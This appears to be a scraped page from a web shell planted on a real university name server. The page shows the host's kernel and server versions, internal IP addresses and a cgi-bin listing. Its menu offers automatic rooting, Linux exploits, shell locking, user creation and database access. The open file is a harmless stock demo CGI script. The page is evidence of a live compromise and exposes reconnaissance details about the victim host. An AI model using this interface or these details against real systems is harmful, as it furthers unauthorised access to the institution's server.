Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
cgi-bin /
[ HOME SHELL ]
Name
Size
Permission
Action
printenv
820
B
-rw-r--r--
printenv.vbs
1.05
KB
-rw-r--r--
printenv.wsf
1.11
KB
-rw-r--r--
test-cgi
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : printenv.wsf
' ' To permit this cgi, replace ' on the first line above with the ' appropriate shebang, f.e. '!c:/windows/system32/cscript -nologo ' ' ***** !!! WARNING !!! ***** ' This script echoes the server environment variables and therefore ' leaks information - so NEVER use it in a live server environment! ' It is provided only for testing purpose. ' Also note that it is subject to cross site scripting attacks on ' MS IE and any other browser which fails to honor RFC2616. '' '' printenv -- demo CGI program which just prints its environment '' <job> <script language="JScript"> WScript.Echo("Content-type: text/plain; charset=iso-8859-1\n"); var objShell = new ActiveXObject("WScript.Shell"); var objArray = new Array(); var e = new Enumerator(objShell.Environment("PROCESS")); for (;!e.atEnd();e.moveNext()) { var i = e.item().indexOf("="); var envvar = e.item().substring(0, i); var envval = e.item().substring(i + 1, e.item().length); envval = envval.replace("\n", "\\n"); objArray.push(envvar + "=\"" + envval + "\""); } objArray.sort(); WScript.Echo(objArray.join("\n")); </script> </job>
Close